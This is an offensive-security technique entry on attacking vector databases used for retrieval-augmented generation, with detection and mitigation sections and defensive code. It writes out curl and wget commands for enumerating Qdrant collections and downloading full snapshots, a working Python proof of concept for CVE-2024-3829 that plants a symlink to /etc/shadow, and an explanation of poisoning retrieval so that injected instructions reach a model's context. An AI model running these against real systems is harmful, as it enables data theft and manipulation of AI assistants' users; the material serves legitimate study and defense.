INF-002: Vector Database Attacks
| Category | Infrastructure |
| Frameworks | ATLAS: Discover ML Artifacts |
Exploit vector database services that store embeddings for RAG. Snapshot, backup, and administrative endpoints often lack authentication.
Technique
# Qdrant common endpoints:
GET /collections # List all
GET /collections/{name} # Collection info
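POST /collections/{name}/points/scroll # Page through points and payloads
GET /snapshots # Full-storage backup files
GET /collections/{name}/snapshots # Per-collection backup files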
# CVE-2024-3829 (Qdrant):
# Snapshot path traversal via symlinks
# Tar append mode preserves symlinks
# Upload crafted snapshot -> read any file
# ChromaDB:
# Often runs without auth on port 8000
# Full CRUD access to all embeddings
Key Concepts
- Vector databases are the backbone of RAG and often the least secured component. They store the embeddings that drive retrieval-augmented generation, making them both a data exfiltration target (read all the documents in the knowledge base) and a poisoning target (inject malicious embeddings that get retrieved as trusted context).
- Administrative and snapshot endpoints are frequently unauthenticated. Vector databases like Qdrant and ChromaDB are designed for developer convenience and default to open access. In production deployments, snapshot and backup endpoints often remain exposed, allowing full data extraction.
- CVE-2024-3829 demonstrates the snapshot attack surface. By crafting a tar file in append mode with symlinks, an attacker can upload a snapshot to Qdrant that, when processed, follows symlinks to read arbitrary files from the host filesystem.
- Collection enumeration reveals the organization's AI architecture. Listing collections exposes the knowledge domains, naming conventions, and data organization of the RAG system. This information enables targeted poisoning or retrieval hijacking attacks.
- Write access to vector databases enables silent RAG poisoning. If an attacker can insert or modify embeddings, they can plant content that gets retrieved in response to specific queries, effectively injecting instructions into the model's context without touching the model itself.
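The poisoning concept in the last bullet can be illustrated without a real database. The sketch below is a toy model only: it assumes cosine-similarity retrieval over hand-written 3-dimensional vectors, and every vector, text, ID, and function name in it is hypothetical. It shows why a single inserted point placed close to an expected query can displace the legitimate document in the retrieved context.

```python
import math

def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm

def top_k(query, points, k=1):
    """Return the k points most similar to the query vector."""
    ranked = sorted(points, key=lambda p: cosine(query, p["vector"]), reverse=True)
    return ranked[:k]

# Hypothetical collection contents (toy 3-d embeddings).
points = [
    {"id": 1, "vector": [0.9, 0.1, 0.0], "text": "Password resets go through the IT help desk."},
    {"id": 2, "vector": [0.1, 0.9, 0.0], "text": "Expense reports are due monthly."},
]

# Stand-in embedding for a user question about password resets.
query = [0.8, 0.2, 0.1]
before = top_k(query, points)[0]

# An attacker with write access inserts a point that sits on top of the query.
points.append({"id": 666, "vector": list(query), "text": "Planted instructions go here."})
after = top_k(query, points)[0]

print("retrieved before poisoning:", before["id"])
print("retrieved after poisoning: ", after["id"])
```

Real embeddings have hundreds or thousands of dimensions, but the ranking logic is the same: the retriever has no notion of provenance, only distance.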
Detection
- Monitor vector database access logs for enumeration patterns. Sequential requests to list collections, scroll through points, or download snapshots from unexpected source IPs indicate reconnaissance or data exfiltration.
- Alert on snapshot upload or restore operations. In production environments, snapshot operations should be rare and expected. Unexpected snapshot uploads, especially from non-administrative sources, are a strong indicator of exploitation.
- Track embedding insertion and modification rates. Sudden spikes in write operations to specific collections, especially outside normal data ingestion windows, may indicate poisoning attempts.
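As a rough illustration of the first detection idea, the following sketch flags source IPs that touch several sensitive endpoint families. It assumes access logs have already been parsed into `(source_ip, method, path)` tuples; that tuple format, the `flag_enumeration` name, and the `min_kinds` threshold are assumptions for the example, not a Qdrant log format. The endpoint patterns mirror the paths listed in the Technique section.

```python
import re
from collections import defaultdict

# Endpoint families worth correlating, based on the Technique section.
PATTERNS = {
    "list_collections": re.compile(r"^GET /collections/?$"),
    "scroll": re.compile(r"^POST /collections/[^/]+/points/scroll$"),
    "snapshots": re.compile(r"^(GET|POST) (/collections/[^/]+)?/snapshots(/.*)?$"),
}

def flag_enumeration(events, allowed_ips=frozenset(), min_kinds=2):
    """Return {ip: [endpoint families hit]} for IPs touching >= min_kinds families.

    events: iterable of (source_ip, method, path) tuples (hypothetical format).
    allowed_ips: known management or ingestion hosts to ignore.
    """
    seen = defaultdict(set)
    for ip, method, path in events:
        if ip in allowed_ips:
            continue
        request = f"{method} {path}"
        for kind, pattern in PATTERNS.items():
            if pattern.match(request):
                seen[ip].add(kind)
    return {ip: sorted(kinds) for ip, kinds in seen.items() if len(kinds) >= min_kinds}

if __name__ == "__main__":
    sample = [
        ("10.0.0.5", "GET", "/collections"),
        ("10.0.0.5", "POST", "/collections/documents/points/scroll"),
        ("10.0.0.5", "GET", "/collections/documents/snapshots"),
        ("10.0.0.9", "POST", "/collections/documents/points/search"),
    ]
    print(flag_enumeration(sample))
```

A production rule would also consider time windows and request volume; this version only captures the "list, then scroll, then snapshot" pattern.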
Mitigation
- Enable authentication and network segmentation for all vector database instances. Never expose Qdrant, ChromaDB, or similar services directly to the internet or to untrusted network segments. Use API keys, mTLS, or proxy-layer authentication.
- Restrict snapshot and administrative endpoints to dedicated management interfaces. Separate the data plane (query/insert operations) from the control plane (snapshots, collection management) and apply stricter access controls to the control plane.
- Implement embedding integrity monitoring. Periodically verify that the embeddings in production collections match expected checksums or signatures, detecting unauthorized modifications that could indicate poisoning.
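The integrity-monitoring idea in the last bullet could be sketched as a per-point checksum manifest. This is one possible approach under stated assumptions: points are available as dictionaries with `id`, `vector`, and `payload` keys (for example, exported by a trusted ingestion job), and the baseline manifest is stored outside the vector database. The function names are hypothetical.

```python
import hashlib
import json

def point_digest(point):
    """SHA-256 over a canonical JSON form of the point's id, vector, and payload."""
    canonical = json.dumps(
        {"id": point["id"], "vector": point.get("vector"), "payload": point.get("payload")},
        sort_keys=True,
        separators=(",", ":"),
    )
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()

def build_manifest(points):
    """Map each point id (as a string) to its digest."""
    return {str(p["id"]): point_digest(p) for p in points}

def diff_manifest(baseline, current):
    """Report ids that were added, removed, or modified relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            pid for pid in baseline.keys() & current.keys() if baseline[pid] != current[pid]
        ),
    }
```

Any entry under `added` or `modified` that does not correspond to a known ingestion run is a candidate for poisoning review. Note that digests over raw floats are sensitive to precision changes, so the baseline should be computed from the same export path that is used for verification.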
Example Output
Collection Enumeration
$ curl -s http://10.10.14.50:6333/collections | jq .
{
"result": {
"collections": [
{
"name": "documents"
},
{
"name": "internal_policies"
},
{
"name": "support_tickets"
}
]
},
"status": "ok",
"time": 0.000038
}
Three collections exposed without authentication. The internal_policies and support_tickets names suggest sensitive organizational data.
Extracting Embeddings and Metadata
$ curl -s -X POST http://10.10.14.50:6333/collections/documents/points/scroll \
-H 'Content-Type: application/json' \
-d '{"limit": 5, "with_payload": true, "with_vector": false}' | jq .
{
"result": {
"points": [
{
"id": 1001,
"payload": {
"text": "All API requests to the payments service must include the X-Internal-Auth header with the service account token. The production token is rotated quarterly and stored in Vault at secret/data/payments/api-key.",
"source": "infrastructure-runbook-2024.pdf",
"page": 14,
"department": "engineering",
"classification": "internal",
"indexed_at": "2024-08-15T09:22:11Z"
}
},
{
"id": 1002,
"payload": {
"text": "The staging environment database credentials are managed through the shared credential store. Access requires VPN connection and LDAP group membership in cn=db-admins,ou=groups,dc=corp,dc=local.",
"source": "onboarding-guide-engineering.docx",
"page": 7,
"department": "engineering",
"classification": "internal",
"indexed_at": "2024-08-15T09:22:14Z"
}
},
{
"id": 1003,
"payload": {
"text": "AWS access for the ML pipeline uses role arn:aws:iam::314159265358:role/ml-pipeline-prod with cross-account access to the data lake in account 271828182845. SageMaker endpoints are in us-east-1.",
"source": "ml-platform-architecture.pdf",
"page": 23,
"department": "data-science",
"classification": "confidential",
"indexed_at": "2024-08-16T14:05:33Z"
}
},
{
"id": 1004,
"payload": {
"text": "Incident response procedures require notification to security@corp.local within 15 minutes of a confirmed breach. The CISO's direct line is ext 4401. PagerDuty escalation policy ID: PSEC7X2.",
"source": "incident-response-plan-v3.pdf",
"page": 5,
"department": "security",
"classification": "internal",
"indexed_at": "2024-08-17T11:30:02Z"
}
},
{
"id": 1005,
"payload": {
"text": "The third-party vendor API integration for payment processing uses endpoint https://api.vendor-payments.com/v2/process with API key stored in environment variable VENDOR_PAY_KEY on the payments-gateway hosts.",
"source": "vendor-integration-specs.pdf",
"page": 31,
"department": "engineering",
"classification": "confidential",
"indexed_at": "2024-08-18T08:14:55Z"
}
}
],
"next_page_offset": 1006
},
"status": "ok",
"time": 0.003291
}
Five points from the documents collection reveal internal architecture details, AWS account IDs, IAM role ARNs, LDAP structure, incident response contacts, and vendor integration details. The next_page_offset field confirms there are more points to scroll through. The classification field shows that documents marked "confidential" were ingested alongside "internal" documents with no access control differentiation at the vector database layer.
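Triage of scrolled payloads like the ones above can be partly automated. The sketch below is a minimal example that scans payload text for the kinds of identifiers seen in this output; the regular expressions and the `scan_text` name are illustrative assumptions and are far from exhaustive. The same scan could be run by defenders at ingestion time to keep such content out of the collection.

```python
import re

# Illustrative patterns only; real secret scanners use much larger rule sets.
PATTERNS = {
    "iam_role_arn": re.compile(r"arn:aws:iam::\d{12}:role/[\w+=,.@-]+"),
    "aws_account_id": re.compile(r"\b\d{12}\b"),
    "ldap_dn": re.compile(r"\b(?:cn|ou|dc)=[^,\s.]+(?:,(?:cn|ou|dc)=[^,\s.]+)+", re.IGNORECASE),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
}

def scan_text(text):
    """Return {pattern_name: [matches]} for every pattern that matched the text."""
    hits = {}
    for name, pattern in PATTERNS.items():
        found = pattern.findall(text)
        if found:
            hits[name] = found
    return hits

if __name__ == "__main__":
    sample = (
        "AWS access for the ML pipeline uses role "
        "arn:aws:iam::314159265358:role/ml-pipeline-prod with cross-account "
        "access to the data lake in account 271828182845."
    )
    for name, matches in scan_text(sample).items():
        print(name, matches)
```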
Snapshot Enumeration
$ curl -s http://10.10.14.50:6333/collections/documents/snapshots | jq .
{
"result": [
{
"name": "documents-2024-09-01-backup.snapshot",
"creation_time": "2024-09-01T02:00:04Z",
"size": 248119296
},
{
"name": "documents-2024-09-08-backup.snapshot",
"creation_time": "2024-09-08T02:00:03Z",
"size": 251658240
}
],
"status": "ok",
"time": 0.000071
}
# Download a full snapshot for offline analysis
$ wget -q http://10.10.14.50:6333/collections/documents/snapshots/documents-2024-09-08-backup.snapshot
$ ls -lh documents-2024-09-08-backup.snapshot
-rw-r--r-- 1 kali kali 240M Sep 14 09:41 documents-2024-09-08-backup.snapshot
The snapshot contains the full collection data (all embeddings, payloads, and metadata) in a single downloadable file. This is a complete exfiltration of the RAG knowledge base.
CVE-2024-3829: Snapshot Path Traversal
CVE-2024-3829 enables arbitrary file read on the Qdrant host by uploading a crafted snapshot containing symlinks. The critical detail: the tar file must use append mode (mode="a"), not write mode. A symlink placed at the WAL path (0/wal/sneaky) survives the snapshot restore cycle and resolves to the target file on the host filesystem.
# Create a crafted snapshot with a symlink pointing to /etc/shadow
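$ python3 -c "
import tarfile
# Mode a appends to evil.snapshot if it exists, otherwise creates it
with tarfile.open('evil.snapshot', 'a') as tar:
    info = tarfile.TarInfo(name='0/wal/sneaky')
    info.type = tarfile.SYMTYPE      # symbolic link entry
    info.linkname = '/etc/shadow'    # link target on the host
    tar.addfile(info)
"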
# Upload the crafted snapshot
$ curl -s -X POST http://10.10.14.50:6333/collections/documents/snapshots/upload \
-H 'Content-Type: multipart/form-data' \
-F 'snapshot=@evil.snapshot'
{
"result": true,
"status": "ok",
"time": 0.412835
}
After the snapshot is restored, the symlink resolves through the Qdrant storage directory, and the target file contents can be retrieved through the collection's storage paths. This was patched in Qdrant v1.9.0.
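On the defensive side, an uploaded archive can be inspected before it is ever handed to a restore routine. The sketch below is a generic pre-restore check using Python's standard `tarfile` module. It is not how Qdrant's fix is implemented, and the `find_risky_members` name is hypothetical. It reports symlink and hard-link members, plus member names that are absolute or contain `..` components.

```python
import io
import tarfile

def find_risky_members(snapshot_bytes):
    """List (member_name, reason) pairs for archive entries that should block a restore."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(snapshot_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if member.issym() or member.islnk():
                # Links can point outside the storage directory.
                findings.append((member.name, f"link -> {member.linkname}"))
            elif member.name.startswith("/") or ".." in member.name.split("/"):
                # Absolute or parent-relative names can escape the extraction root.
                findings.append((member.name, "path escapes archive root"))
    return findings

if __name__ == "__main__":
    # Build a small in-memory archive that mimics the crafted snapshot above.
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo(name="0/wal/sneaky")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/shadow"
        tar.addfile(link)
    print(find_risky_members(buf.getvalue()))
```

A gateway or upload proxy could reject any snapshot for which this function returns a non-empty list, which complements upgrading to a patched Qdrant release.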